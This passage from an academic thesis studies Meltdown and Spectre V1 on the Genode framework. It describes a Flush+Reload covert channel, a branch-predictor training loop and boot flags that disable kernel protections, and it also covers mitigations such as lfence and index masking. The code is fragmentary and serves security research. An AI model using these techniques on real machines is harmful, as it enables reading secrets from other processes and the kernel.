2.4.4 Mitigations There have been efforts to mitigate both Meltdown and Spectre in software; consequently, there is a need to present which mitigations exist, how they work and how they are applied. Lipp et al. described how the Kernel Address Isolation to have Side Channels Efficiently Removed (KAISER) patch mitigates Meltdown by removing the kernel map from user space and, therefore, removes Meltdown’s ability to access kernel memory [31]. KAISER has now been renamed to Kernel Page-Table Isolation (KPTI) and was introduced in version 4.15-rc4 of the Linux kernel5. Prout et al. [36] found that KPTI slowed down disk accesses by up to 50% due to increased execution time of a user-to-kernel .

2.4.5 Meltdown on Genode Genode’s founder Feske6 has discussed the implications of Meltdown on Genode. Feske stated that due to the minimalistic responsibilities of the microkernel, there is not as much information to leak from the kernel. Furthermore, the only memory pages shared between user applications and the kernel are control blocks. This limits the accessible information through shared LLC. Feske also suggested that the Meltdown attack should be tested on different kernels to get a complete picture of what information can be leaked. Genode’s signal handling is not as adaptable as the one in Linux. An attacker cannot install a custom handler for the segmentation fault [7]. Consequently, the attacker cannot recover from a segmentation fault in this way.

2.5 Spectre

Spectre is a class of microarchitectural attack leveraging speculative execution on some modern processors [24]. Spectre attacks can be used to read memory from other user processes or the kernel. Kocher et al. [24] described four different attacks; in this thesis, we will focus on the attack exploiting conditional branches Spectre Version 1 (Spectre V1).

5J. Corbet. The current state of kernel page-table isolation [LWN.net]. Dec. 2017. URL: https : / / lwn . net / Articles/741878/ (visited on 2019-01-23). 6N. Feske. Side-channel attacks(Meltdown, Spectre). 2018. URL: https://sourceforge.net/p/genode/ mailman/message/36178974/ (visited on 2019-01-16).

12 2.5. Spectre

2.5.1 Spectre V1 Attack Description Spectre V1 exploits speculative execution to bypass conditional branches. To execute Spectre V1, an attacker first needs to find a vulnerable function in another process. One example of a vulnerable function can be seen in Listing 2.5. For this example to work, shared_array needs to point on memory shared by the attacker and the victim. This example function is vulnerable to a SCA which can allow an attacker to read the private_array, but by using Spectre V1, an attacker could also read data outside private_array. An attacker can by calling the function read_data many times with idx smaller than the size of private_array train the CPU to speculatively evaluate the condition on line 2 to true and furthermore, execute line 3. The speculative execution can be triggered if the variable size_of_private_array is not cached and, therefore, takes hundreds of CPU cycles to fetch. If the CPU after this speculative execution evaluates the condition on line 2 to false, line 3 is never committed. The speculative execution may still have left data in the cache which may be read by the attacker using Flush+Reload or another cache-based SCA. Listing 2.5: A function which is vulnerbale to Spectre V1. 1 void read_data(unsigned int idx){ 2 if (idx < size_of_private_array) 3 dummy = shared_array[private_array[idx]] 4 }

2.5.2 Spectre V1 Mitigations Spectre V1 relies on speculative execution for its exploit, thus, a straight forward approach for mitigation would be to disable speculative execution. Disabling speculative execution may, however, degrade performance according to Kocher et al. [24]. Another strategy proposed by Kocher et al. is to apply a bitmask to the index, effectively forcing the index to be within the bounds of the array. This method, due to dependant computations, does not allow for the array access to be invalid [19].

2.5.2.1 Preventing Speculative Execution Intel recommends the use of the lfence instruction to prevent speculative execution as it serializes instructions and has good performance over other serializing instructions [18].Listing 2.6 shows how the lfence instruction can be applied to mitigate Spectre V1 in the vulnerable function. Listing 2.6: A function which was vulnerable to Spectre V1 after the load fence mitigation has been applied. 1 void victim(size_t idx) { 2 if(idx < array_size) { 3 _mm_lfence();// Guaranteed to be executed 4 int foo = array[idx];// after condition is evaluated 5 do_something(foo); 6 } 7 }

Microsoft have added a feature in their MSVC compiler which allows the compiler to add a speculative code execution barrier, similar to lfence. This mitigation should have a negligible impact on performance according to Microsoft7.

7Microsoft. “/Qspectre”. In: (Oct. 2018). URL: https://docs.microsoft.com/en- us/cpp/build/ reference/qspectre?view=vs-2019 (visited on 2019-04-16).

13 2.5. Spectre

2.5.2.2 Index Bitmasking Stuart [43] showed a Spectre V1 mitigation which used bit operations to remove the possibility of indexing outside the array. Listing 2.7 shows an example of a function which uses these bit operations to mitigate a Spectre V1 attack. Line 4 in the Listing sets mask to a negative number if size >= idx. The OR operation on line 4 prevents an attack from overflowing the conversion8. After right shifting in line 6 mask will contain only 0s if size < idx or else only 1s. This code is dependent on arithmetic right shift, which is implementation-defined9, and thus depends on the compiler and architecture. Line 8 inverts mask to simplify the operation on line 10, where idx is OR:d with either 0s, if idx >= size or else 1s. Hance, the array cannot be indexed with a value greater or equal to size. Listing 2.7: A function which was vulnerable to Spectre V1 after the bitmask mitigation has been applied. 1 void victim(unsigned long idx) { 2 // unsigned long size 3 if (idx < size){ 4 // Set mask to negative number if size >= idx 5 long mask = idx | (size - 1 - idx); 6 // mask=0x000.... if mask<0 else0xFFF... 7 mask >>= (sizeof(long) - 1);// arithmetic right shift 8 // mask=0xFFF... if mask=0x000... else0x000... 9 mask = ~(mask); 10 // idx& mask= idx if mask=0xFFF... else0 11 int foo = array[idx & mask]; 12 } 13 }

A mitigation similar to the one described in Listing 2.7 has been implemented in the Linux kernel10, see Listing 2.8. This mitigation uses two instructions to perform the bit masking. The first instruction, "cmp %1,%2", sets the carry flag to 1 if size < idx. The next instruction, "sbb %0,%0;", sets mask either to -1, if the carry flag is set, or 0 otherwise. Consequently, array_index_mask_nospec will return 0x00000000 if idx >= size and 0xFFFFFFFF otherwise. OR:ing idx with the returned value will give either idx if idx is in range and 0 otherwise.

8J. Corbet. Meltdown/Spectre mitigation for 4.15 and beyond [LWN.net]. Jan. 2018. URL: https://lwn.net/ Articles/744287/ (visited on 2019-03-25). 9Arithmetic operators. URL: https://en.cppreference.com/w/c/language/operator_arithmetic (visited on 2019-03-25). 10D. Williams. x86: Implement array_index_mask_nospec. Jan. 2018. URL: https://git.kernel.org/pub/ scm/linux/kernel/git/tip/tip.git/commit/?id=babdde2698d482b6c0de1eab4f697cf5856c5859 (visited on 2019-03-26).

14 2.6. Performance

Listing 2.8: A function which was vulnerable to Spectre V1 after the built-in Linux kernel mitigation has been applied. 1 /* Source from 2 * https://git.kernel.org/pub/scm/linux/kernel/git/tip/tip.git 3 * commit= babdde2698d482b6c0de1eab4f697cf5856c5859 4 */ 5 static inline unsigned long 6 array_index_mask_nospec(unsigned long idx, unsigned long size) { 7 unsigned long mask; 8 asm ("cmp %1,%2;""sbb %0,%0;" 9 :"=r" (mask) :"r"(size),"r" (index) 10 :"cc"); 11 return mask; 12 } 13 14 void victim(unsigned long idx) { 15 // unsigned long size 16 if (idx < size){ 17 idx &= array_index_mask_nospec(idx, size); 18 int foo = array[idx]; 19 } 20 }

2.6 Performance

In order to evaluate the performance impact of mitigations against Spectre on RPC, there is a need for a basic understanding of IPC performance and microkernel performance. In addition, we present criticism against microkernel performance and performance of monolithic designs.

2.6.1 Microkernel Performance Lameter [26] has looked at the performance of a monolithic Linux kernel compared to an abstract microkernel and discusses the microkernels inability to scale with increasing counts of processes.

2.6.2 IPC Performance Immich et al. [17] performed the analysis by measuring the time it took for two processes to exchange messages over the different IPC mechanisms, to get the current time the function gettimeofday was used since it provides microsecond accuracy. A similar study has been done for Sel4:s current IPC [49], which examined overhead of allocating different IPC mechanisms as well as execution time for using them.

2.7 Related Work

Genode is not the only issue of process separation and resource limitation, for a good understanding of the benefits and disadvantages of microkernels, the alternative solutions need to be understood. Besides, there is a body of work relating to Genode and security which is not relevant to microarchitectural attacks specifically but which do motivate an interest to investigate them.

15 2.7. Related Work

2.7.1 Genode Genode has seen work related to security, Constable et al. [5] worked on extending formal Sel4 verification to Virtual Machine Monitor (VMM) running on Genode. Lange et al. [28] used Genode and a microkernel to form a secure encapsulation of smartphone OSs. Waddington et al. [46] implemented a high performance web-cache using Genode+Fiasco.OC. Hamad and Prevelakis [13] measured IPsec performance on Genode running on Rasperry PIs. Several other works have focused on using Genode as a means to achieve a secure OS. Brito et al. [1] used Genode as a secure kernel base to process images securely on an ARM TrustZone cloud environment. Ribeiro et al. [38] used Genode to construct a Trustzone-backed database management system. Ramos [37] proposed the development of a toolkit, using Genode as a base, easing development of Trustzone projects. Harp et al. [14] recommends a reference architecture ISOSCELES for medical devices building on Genode, using either Nova or Sel4 as a microkernel base. Hamad et al. [12] used Genode to implement a secure intra-vehicle communication framework, utilizing its IPC mechanisms for efficient message passing. Genode has seen little work related to microarchitectural attacks and side channels. Schmidt et al. [39] constructed a covert channel in Genode which exploited a software cache to construct a timing channel. However, to the best knowledge of the authors, there has been no other work relating to SCAs in Genode.

2.7.2 Side Channels Xiao et al. [47] demonstrate a covert channel using execution time for write accesses to shared memory pages. They leverage the Copy-On-Write (COW) technique, which is commonly used for shared memory implementations. COW copies the requested page and writes to the copy on demand, thus revealing if a page is shared or not by measuring the time of executing a write [47]. Xiao et al. [47] also demonstrate, using this technique, examples of a covert channel transmitting 50-90 bps for practical applications. Pessl et al. [35] present a covert cross CPU channel utilizing varying access times of memory banks in DRAM. They demonstrated a channel with a capacity of 2.1 Mbps with an error probability of 1.8% and across VM channel with a capacity of 596 kbps with an error probability of 0.4%

2.7.3 Microarchitectural Attacks Mcilroy et al. [33] examined the deep seated implications of how Spectre and incorrect hardware models affect confidentiality-enforcing programming languages. Mcilroy et al. showed that that these confidentiality guarantees are completely compromised by Spectre. Koruyeh et al. [25] showed that the Return Stack Buffer (RSB) could be exploited instead of the BPU, thus introducing a class of SpectreRSB attacks. Koruyeh et al. were not successful in demonstrating these attacks on ARM and AMD CPUs. However, ARM and AMD CPUs also utilize an RSB and should therefore be vulnerable. There has also been work examining SCAs targeting ARM Trustzone. Lapid and Wool [29] mounted a side-channel cache attack against the ARM32 AES implementation used by the Keymaster trustlet. Another work by Bukasa et al. [3] showed the ineffectiveness of Trustzone to prevent power analysis SCAs. Microarchitectural attacks are also a quickly progressing field. A recent work by Schwarz et al. demonstrated the ZombieLoad attack, a new type of microarchitectural attack which exploits a fill buffer to read data from other processes [40]. This fill buffer is a type of load queue which is shared between hyper threads. This buffer can under certain circumstances trigger a load which has been initially issued on another core and thereby can leak data from loads issued by other processes [40].

16 2.7. Related Work

2.7.4 Linux Control Groups The Linux kernel implements limitation of resources in the form of control groups (cgroups). According to the man-page for cgroups:

"A cgroup is a collection of processes that are bound to a set of limits or parameters defined via the cgroup filesystem." [4]

Cgroups can restrict the use of resources like CPU and memory for processes in a cgroup. Cgroups may also provide guarantees of CPU time for processes in a group. However, unlike Genode, cgroups do not allow non-root processes in a cgroup to have children of their own [4].

2.7.5 Security by Virtualization Using a small kernel is not the only way to potentially enhance the security of a system. Another feasible option is to use different virtual systems to separate processes. The virtual systems need to be running on a hypervisor, which may be attacked. Thongthua and Ngamsuriyaroj [44] discusses some weaknesses they found in popular hypervisor software. However, the abstraction of virtualization does not prevent microarchitectural attacks such as Meltdown or Spectre [31, 24]. Irazoqui et al. [21] recovered an AES key in a cross-virtual machine setup using a SCA that abused the LLC. The attack is not dependent on the virtual machine running on the same core since the LLC cache was used. Virtualization also adds to overhead by handling multiple OSs running on the hardware.

17 3 Method

This chapter first begins by presenting how the tested system was set up, including how output was obtained, how the kernels were set up with Genode and how they were booted. Secondly, presents the design and measurement method used for the covert Flush+Reload channel. Thirdly, the design of the Meltdown attack and Spectre V1 attack is presented. Lastly, the methodology for measuring the performance impacts of Spectre V1 mitigations is presented.

3.1 Setting up System Under Test

The System Under Test (SUT) is composed of Genode with a microkernel core, an attack implementation and an output channel. This setup was executed on an Intel Core i5-7500 CPU. We used Genode’s build tools and documentation to build our implementation for each kernel 1. These build tools were available at Genode’s Github page 2. To run a build, Genode requires an init-component which is assigned all system resources. Genode then delegates the task of assigning resources to this init-component. We build our implementation by assigning an initial resource budget to our process, thus enabling it to execute, use RPC and allocate memory. Figure 3.1 shows how the init process may start and delegate resources to two user processes. Genode’s build tools will from our configuration create files which are used to boot the kernel with our implementation. These files can be used by Grub2 to multi-boot the tested SUT.

3.1.1 Using x86 Intrinsics The content from the file: /genode-gcc/lib/gcc/x86_64-pc-elf/6.3.0/include/mm_malloc.h, was removed due to a compiler error. This was needed to allow for the use of the library file , which supports instructions for the rdtsc and lfence instructions.

1https://genode.org/documentation/developer-resources/index 2https://github.com/genodelabs/genode/tree/18.11

18 3.1. Setting up System Under Test

Microkernel

Genode

Init

User proc. 1 RPC User proc. 2

Figure 3.1: Overview of Genode’s Hierarchy

3.1.2 Obtaining Output Serial communication was used between the system under test and another computer to obtain output from the attacking application, see Figure 3.2. This was done to obtain output, as Genode does not include a per default. Instead, the default behavior of Genode is to forward all log events to the serial port. To configure the serial port a modification of Bender was needed. Bender is a small kernel which is used to boot the host kernel. Per default, on boot, Bender finds a serial port and saves the address of this port to a specific memory address [7]. After that, Bender boots the microkernel and Genode. Genode can now look at that address to know which serial port to forward all logs to.

Measuring System Test System

Output to monitor Serial communication

Figure 3.2: The communication setup to retrieve output from the tested system.

Bender did not choose the correct serial port on the tested PC and was therefore modified to select a serial port in use. The used Bender version can be found at Alexander Boettcher’s Github page 3. We changed the file 4 so that com0_port was chosen to 0x3f8. Where 0x3f8 is the address to the serial port on the test PC, as shown by running the command dmesg in Linux. The change made to Bender can be seen in Listing 3.1 and 3.2.

3https://github.com/alex-ab/morbo/tree/e4744198ed481886c48e3dee12c1fbd47411770f 4https://github.com/alex-ab/morbo/blob/cb5ec9453af8e7f5d63289aa1884106ce95b4a36/ standalone/bender.c

19 3.1. Setting up System Under Test

Listing 3.1: Genode’s Default Bender if (!serial_ctrl.cfg_address && !iobase && serial_ports(get_bios_data_area()) && serial_fallback) { *com0_port = 0x3f8; *equipment_word = (*equipment_word & ~(0xF << 9)) | (1 << 9); }

Listing 3.2: Genode’s Bender After Applied Changes /* if(!serial_ctrl.cfg_address &&!iobase && serial_ports(get_bios_data_area()) && serial_fallback) { */ *com0_port = 0x3f8; *equipment_word = (*equipment_word & ~(0xF << 9)) | (1 << 9); //}

3.1.3 Building and Running on Nova Genode’s build tool created the files hypervisor and image.elf.gz when an application was compiled for Genode+Nova. These files were located at: /var/run/spectre/boot, if an application named "spectre" was compiled. These files can be used in Grub2 to boot the kernel on bare hardware. Grub2 can be configured to boot Nova by adding the menu entry shown in Listing 3.3, where is the folder containing hypervisor and image.elf.gz. Listing 3.3: Grub2 Menu Entry for Nova 1 menuentry’Genode Spectre Nova’{ 2 insmod multiboot2 3 insmod gzip 4 multiboot2 <...>/bender# Path to modified bender binary. 5 module2 /hypervisor hypervisor iommu nopid novga serial 6 module2 /image.elf.gz image.elf 7 }

3.1.4 Building and Running on Okl4 Genode’s build tool created the file image.elf when an application was compiled for Genode+Okl4. This file was located at: /var/run/spectre/boot, when and application name "spectre" was compiled. This file can be used with Grub2 to boot the kernel on bare hardware. Grub2 can be configured to boot Okl4 by adding the menu entry shown in Listing 3.4, where is the folder containing image.elf.

20 3.1. Setting up System Under Test

Listing 3.4: Grub2 Menu Entry for Okl4 1 menuentry’Genode Spectre Okl4’{ 2 insmod multiboot2 3 multiboot2 <...>/bender# Path to modified bender binary. 4 module2 /image.elf 5 }

Our application did not build on Okl4 by using the default build file. We added march= native to compile programs containing assembly instructions. The march=native flag tells the compiler to tailor the assembly instruction set for the used CPU5.

3.1.5 Building and Running on Linux The output from the Genode application was forwarded from the terminal to the serial port. This was done to use the same measurement methodology as for the two other kernels.

3.1.6 Measuring Throughput To measure the channel’s or the attacks’ throughput, a fixed string message m of length n was transmitted. Throughput T was then calculated as the number of correctly transmitted bytes per second (Bps) of transmission. This definition of throughput has been used to measure other microarchitectural attacks [31, 25]. A byte in position i was considered correctly transmitted if the received byte ri had the same value as the message byte mi. The throughput, T, was calculated as: ° n C(m , r ) T = i=0 i i (3.1) tn , where # 1 if r = m C(m, r) = 0 otherwise , and tn = Total execution time in seconds T = Throughput of the channel C(m, r) = Function to determine equality of bytes . An array of size 2048 bytes was used to measure throughput. Every leaked byte was forwarded via serial communication to the measuring system, see Figure 3.2. Each sent byte was then compared to the correct byte, see Equation (3.1). Genode’s timer object was used in Nova and Linux to measure the total execution time, tn, with millisecond accuracy. Some changes need to be made to the Genode-application run file, where timer needs to be added to build and build_boot_image. The timer object was not used on Okl4; instead, a timer at the measuring system was used to measure tn. On Okl4, a start-timer command was transmitted via the serial port before the first transmission byte and an end-timer command after the last byte. The timer on the measuring system was started and stopped by these commands. The execution time, tn was transmitted after transmitting all bytes if Genode’s timer object was used.

5Using the GNU Compiler Collection (GCC): x86 Options. URL: https://gcc.gnu.org/onlinedocs/gcc/ x86-Options.html (visited on 2019-03-25).

21 3.2. Implementing the Flush+Reload Channel

3.2 Implementing the Flush+Reload Channel

To answer Research Question 1, we will first demonstrate that Flush+Reload can be used to create a covert channel between two processes in Genode. To verify the result, we construct two conspiring processes which utilizes Flush+Reload in order to communicate a message. Shared memory, allocated to a size of (256 + 2) * Padding, was used for the Flush+Reload channel. There were 256 addresses to distinguish addresses as different values. These addresses were offset using a padding to prevent prefetching between values. Padding was also used at the beginning and at the end of the array to prevent prefetching of shared memory addresses from accesses outside of the array. In Figure 3.3, this design is used to transmit the values by caching the corresponding address. The receiver, pictured in the figure, can then measure access times to each address in the array and conclude which corresponding value was transmitted.

Padding Padding

254 is the answer! 0 1 254 255

Miss Hit!

Receiver

Figure 3.3: A receiver observing access times for a cache hit on a Flush+Reload channel, built on a contiguous padded array.

3.2.1 Measuring Cache Hits A threshold was used to decide whether a value was cached or not cached. This threshold was determined by profiling the time it took for the CPU to access cached and uncached values [48]. The L1 cache or LLC was used depending on the attack design. Therefore, two thresholds were defined. One threshold above the L1 cache and one above the LLC. We assume a memory model of access times as shown in Figure 3.4. In this figure, tLLC is the upper bound for the LLC and tL1 is the upper bound to access the L1 cache. The thresholds tLLC and tL1 are chosen as the upper bound of the measurements for the LLC and L1 cache respectively. This choice was made arbitrarily, with the intent of minimizing false positives while preserving true positives. The time to access a value was measured using the timing function described in Section 2.2.2. To profile uncached accesses, an array of size 4096 ¤ (256 + 2) was used. An internal padding of 4096 bytes was used to prevent prefetching. The time of accessing uncached values was measured by first removing the array from the cache, using clflush. Then measuring the time for accessing each address. A similar method was used to measure the timings for the L1 cache, the difference being that the values were cached in the same process before timing the access. Two processes were used to measure the access times to the LLC, one process which cached the values and one process which timed the access time, see Figure 3.5. If the two

22 3.2. Implementing the Flush+Reload Channel

DRAM Ñ tLLC LLC

tL1 Access Time L1

Figure 3.4: A model of memory access times for different memory levels.

: Measuring Process : Caching Process

RPC_shared_memory()

Shared_memory_cap

Loop Flush current value Lock Tell caching process to start

Cache current index Wait for unlock Unlock

Measure fetch time

Figure 3.5: A sequence diagram for measurements of the LLC access times. processes get scheduled on the same core, the values may be cached in either the L1 cache or the LLC.

3.2.2 Preventing Data Prefetching The in-order loop in Listing 3.5 triggers the CPU to prefetch addresses before they are accessed, resulting in cache hits. This will result in false-positive cache hits for subsequent values. The example in Listing 3.6 on the other hand flushes all possible values and then measures the access time out of order to prevent data prefetching. Listing 3.5: Flush+Reload 1 for i in 0...256 2 clflush(address + i*Padding)// Flush channel from cache 3 wait_for_read()// Wait for reloading process 4 for i in 0...256 5 time(address + i*Padding)// Test value for cache hit

23 3.2. Implementing the Flush+Reload Channel

Listing 3.6: Flush+Mix 1 for i in 0..255 2 clflush(address + i*Padding)// Flush channel from cache 3 wait_for_read()// Wait for reloading process 4 for i in 0..255// 5 m = (i * a + b) % 256//a and 256 relatively prime 6 t = time(leak + m*Padding)// Test value for cache hit 7 if t < LLC_THRESHOLD 8 cache_hits += 1

The offset Padding is used as internal padding to prevent prefetching between values, 4 kB was chosen as the biggest internal padding, as it is the size of pages on the tested system and that the CPU does not prefetch across page boundaries [24, 10]. An example of the array used for the channel can be seen in Figure 3.6, where 4kB internal padding is used.

0 kB 4 kB 8 kB 1020 kB 1024kB 1028 kB

Padding Padding

0 1 254 255

Figure 3.6: Leak Array Layout

SRGs are tested for the best performance of preventing prefetching, measured as no detected cache hits when looping over the array. The SRGs are chosen as m = 256 where a and b in Listing 3.6 are chosen according to the scheme in Section 2.3.2. The SRGs are evaluated by iterating over an array 256 times using indices generated from the SRG. Each access time is measured and checked for a cache hit, as described in Section 3.2.1. The SRGs were further evaluated for the padding sizes 4096, 2048, 1024, 512, 256 and 128. The limits 4096 and 128 were used as they are the page size and cache line size on the tested system. Consequently, the CPU does not prefetch for padding sizes over 4096 bytes and padding below 128 bytes does not guarantee separation between values. All SRGs where a P [1, 255] and b = 0 were evaluated. The offset b = 0 was chosen as a constant offset should not affect prefetching and to limit the number of SRGs to evaluate. Two SRGs are presented, the one with the best performance in Equation (3.2) and an arbitrarily chosen worse SRG in Equation (3.3). The second is used to illustrate the characteristics of a poor performance SRG.

mi = 49i + 0 mod 256 (3.2)

mi = 33i + 0 mod 256 (3.3)

3.2.3 Adapting the Channel to Targeted Kernels Implementation of Flush+Reload required some adaptations depending on the intended target. One adaptation which had to be made is that the rdtsc instruction was used instead of rdtscp as the instruction resulted in a crash on Nova. Thus, the alternative recommended

24 3.2. Implementing the Flush+Reload Channel timer suggested by Paoloni [34] was used for Linux and Okl4, see Listing 2.2. The alternative timer suggested by Paoloni was used for Nova, see Listing 2.3.

3.2.4 Measuring Throughput of the Covert Channel The throughput for the covert Flush+Reload channel was measured for use between two processes, see Figure 3.7, and for use inside a single process. The throughput was measured as described in Section 3.1.6.

: Receiver : Transmitter

RPC_shared_memory()

Shared_memory_cap

Loop Flush all 256 values Lock Tell caching process to start

Cache current data Wait for unlock Unlock

Measure fetch time for index 0..255

Log index corresponding to first LLC hit

Figure 3.7: A sequence diagram of Flush+Reload communication between two processes.

The throughput for communicating internally with Flush+Reload was measured by using a process which first cleared the leak array from the cache, then cached the current value and used lfence to wait for transmitted byte to be cached. The process then continued iterating over all values in the leak array to check for an L1 cache hit. The throughput could after that be measured by using the method described in Section 3.1.6.

3.2.5 Reducing Noise To obtain a reliable Flush+Reload channel it may be necessary to make multiple measurements, as done by others [31, 25]. R measurements, mij, were taken for a value i with the purpose of increasing the accuracy. A cache hit detection function fc was used with a threshold of tc to build a histogram H of recorded cache hits where each entry hi is the count of detected cache hits for value i. The estimation vˆ of the transmitted value v was calculated as: vˆ = max hi iPt0..255u where, ¸R hi = fc(mij) j=0 and, # 1 if x tc fc(x) = 0 otherwise In addition, synchronizing was needed to increase the probability of a successful transmission. Locking was used in order to synchronize the transmitter with the receiver.

25 3.3. Implementing Meltdown

3.3 Implementing Meltdown

The methodology for Meltdown was based on the POC by Lipp et al. [31]. Specifically, Meltdown required methodologies for recovering from a segmentation fault, identifying a target address, obtaining an observable result via a Flush+Reload channel and synchronizing the transmitter with the receiver. Additionally, on the Linux kernel, there was a need to disable KPTI for the attack to work.

3.3.1 Recovering from Segmentation Fault Since Genode does not provide support for segmentation fault handlers [7], another method was needed. One possible method is to start a new child process for each read which leads to a segmentation fault [31]. This method allows for transmitting a single byte with each started child. Another method is to use Intel TSX to suppress the fault [31]. Both methods were evaluated, Intel TSX was chosen due to a more straightforward attack design and fewer resource requirements.

: Server

Loop Use TSX to cache current data Measure fetch time for for index 0..255 Log index corresponding to first LLC hit

Figure 3.8: A sequence diagram of Meltdown using Intel TSX and Flush+Reload.

If Intel TSX is used, no inter-process synchronization is needed. A process will continue its execution even if non-accessible memory was accessed during a transaction. The attacker can therefore run Flush+Reload directly after the Meltdown attack, see Figure 3.8.

3.3.2 Disabling Mitigations Because of the significant impact on performance by KPTI, some kernels enable opting out of these security patches6. The KPTI mitigation can be disabled in Ubuntu+Linux by adding the flag pti=off as a boot parameter for the kernel in the file . To simplify the Meltdown attack on Linux, KASLR can be disabled with nokaslr. This prevents random placement of kernel space at boot.

3.3.3 Choosing a Target Address Two target addresses were used, the Linux version banner and a victim process. Previous work has had success with these variants 7 8. Furthermore, they were chosen due to the ease of confirming success using an existing working attack.

6Ubuntu. MitigationControls - Ubuntu Wiki. 2018. URL: https://wiki.ubuntu.com/SecurityTeam/ KnowledgeBase/SpectreAndMeltdown/MitigationControls (visited on 2019-02-05). 7https://github.com/paboldin/meltdown-exploit 8https://github.com/IAIK/meltdown

26 3.4. Implementing Spectre

In the first alternative, the attacker targets a location for a version string defined in the Linux kernel. Confirmation of correct data was done by reading a file using root privileges. For the second alternative, a victim process was set up to allocate a secret array of 2048 bytes. Calculating its was done using tools published by Lipp et al. 8. The array was cached cached by the victim. Thereby, the address and value of the target addresses are known, and the addresses along with its values are cached. Measuring the throughput of the attack could, thereafter, use the same method as described in Section 3.1.6.

3.4 Implementing Spectre

The design of the Spectre V1 attack consisted of an overall design based on previous work 9 10, see Figure 3.9. Specifically methodologies for ensuring speculative execution, training the branch predictor and increasing accuracy by tuning parameters was used.

: Server : Attacker

RPC_shared_memory()

Shared_memory_cap

Flush all 256 values Train victim_function(x) arr[x]

victim_function(malicious) Measure fetch time for index 0..255 Log index corresponding to first LLC hit

Figure 3.9: A sequence diagram of Spectre using Flush+Reload.

The attack setup consisted of a victim process and an attacker which shared a common output buffer. The victim was a vulnerable RPC which accessed an array based on an input index and a bounds check, see Listing 3.7. The attacker exploits this by issuing Ta ¡ 1 training requests to a victim_function. After Ta ¡ 1 requests the attacker issues a malicious request malicious = target_address with an index targeting an address beyond the bounds of the array. For the attack to work, the vulnerable RPC needs to be speculatively executed and the branch predictor needs to be trained. Listing 3.7: Victim Function which is Vulnerable to Spectre V1 1 void victim(size_t idx) { 2 if(idx < array_size) { 3 int foo = array[idx];// May speculatively execute 4 do_something(foo);// array_size is not in cache 5 } 6 }

9https://gist.github.com/anonymous/99a72c9c1003f8ae0707b4927ec1bd8a 10https://github.com/crozone/SpectrePoC

27 3.4. Implementing Spectre

3.4.1 Ensuring Speculative Execution Speculative execution, according to Intel, is highly dependant on microarchitectural implementation and may vary across different processor families [19]. Kocher et al. [24] state that one trigger for speculative execution is a cache-miss prior to or during branch condition evaluation. Therefore, the boundary check values needs to be removed from the cache. A heuristic flush of the cache was done by performing many memory accesses, see Listing 3.8. CACHE_LINE_SIZE was chosen according to the targeted hardwares cache line size of 64 bytes. This size was retrieved using the command getconf LEVEL1_DCACHE_LINESIZE on Xubuntu 18.04 LTS. Listing 3.8: Heuristic Flush of Non-Shared Condition Variable 1 void heuristic_flush() { 2 for(size_t i = 0; i < Hs; i += CACHE_LINE_SIZE) 3 large_array[i]; 4 } 5 void speculative_execution() { 6 heuristic_flush();// Fill cache with garbage 7 _mm_lfence();// Ensure flush executes before victim 8 victim();// Condition variable 9 }// is hopefully evicted

3.4.2 Configure Variables for Spectre Some parameters needed to be chosen before evaluating the attack throughput. First, two values for training the branch prediction were needed, and secondly a parameter for flushing the cache. Training branch prediction meant polluting the BTB, which is a type of cache [19]. This was done in a similar manner to polluting the LLC; by repetitively committing values to the cache, i.e., branching to the desired location, see Listing 3.9. As described in Section 2.5.1, the value with which the condition is checked needs to be flushed from the cache to trigger speculative execution of the incorrect branch. At this point the condition value was part of the shared memory so that it could be flushed by the attacker. Three parameters were needed to execute the Spectre attack: number of attacks per measurement Na, the attack period Ta and the number of memory accesses used to flush the cache Hs. Attacks per measurement Na and Ta were chosen by testing all integers Na P [1, 10] and Ta P [2, 10] to find which combination gave the highest throughput in reading 2048 bytes from the vulnerable process. To determine values for Na and Ta, Hs was initially chosen to 4096 ¤ 32, it was then tested using an exponential sample between 64 and the size of the CPU’s cache to find a local optimum. It should be noted that the purpose of these local optimizations is not to achieve an optimum, but rather to gauge the possible throughput of this attack.

Na  Number of attacks per measurement

Ta  Attack period (3.4)

Hs  Number of accesses in the heuristic flush

To modify the contents of the BTB during training, some non-branching bit operations were used in place of an explicit branch, see Listing 3.10. Lines 4 and 5 yield x = 0xFFFFFFFF if (i % 6 == 0) else = 0x00000000. Line 6 then evaluates as x = malicious if (x % 6 == 0) else train.

28 3.4. Implementing Spectre

Listing 3.9: Training the Branch Bredictor 1 void spectre() { 2 heuristic_flush(); 3 for(int i = Ta - 1; i >= 0; --i) { 4 if(i % Ta) 5 victim_function(malicious_x);// Ta:th iteration 6 else 7 victim_function(x); 8 } 9 }

Listing 3.10: Training the Branch Predictor Without Explicit Branch 1 void spectre() { 2 heuristic_flush(); 3 for(int i = Ta - 1; i >= 0; --i) { 4 x = ((i % Ta) - 1) & ~0xffff;// Prevent jumps 5 x = (x | (x >> (sizeof(int) * 4)));// and use 6 x = train ^ (x & (malicious ^ train));// maliciousx every 7 victim_function(x);// Ta:th iteration 8 } 9 }

3.4.3 Measuring Throughput The vulnerable process contained an array of size 16+2048 bytes. The first 16 bytes were accessible via RPC and was used for training. The attacker then used Spectre V1 with Flush+Reload to get the last 2048 bytes from the array, and then forwarded the values to the measuring system. From here the method described in Section 3.1.6 was used to measure the throughput.

3.4.4 Measuring Impact of Mitigations Two methods of mitigation were applied to Spectre V1. The first: preventing speculative execution using lfence, see Listing 2.6. The second: Index masking as used in Linux, see Listing 2.8. The impact on performance for the two different mitigations was tested by measuring the execution time for RPC, before and after applied each mitigation. The execution time was measured using the method described in Section 2.2.2.

29 4 Results

The results from the covert Flush+Reload channel, along with its design parameters, is presented in Section 4.1 and is intended to answer Research Question 1. The throughput of the Meltdown attack on Genode+Linux, intended to answer Research Question 3, is presented in Section 4.2 for two different victims. The results for the throughput of the Spectre V1 attack is presented together with RPC benchmarks for its mitigations in Section 4.3. These results are intended to answer Research Questions 2 and 4 respectively.

4.1 Flush+Reload

Results of choosing which thresholds to use for the different kernels and attacks is shown in Section 4.1.1. The results related to preventing prefetching is shown in 4.1.2. Section 4.1.3 shows the throughput of the covert channel and answers Research Question 1. Section 4.1 shows the result from reducing noise.

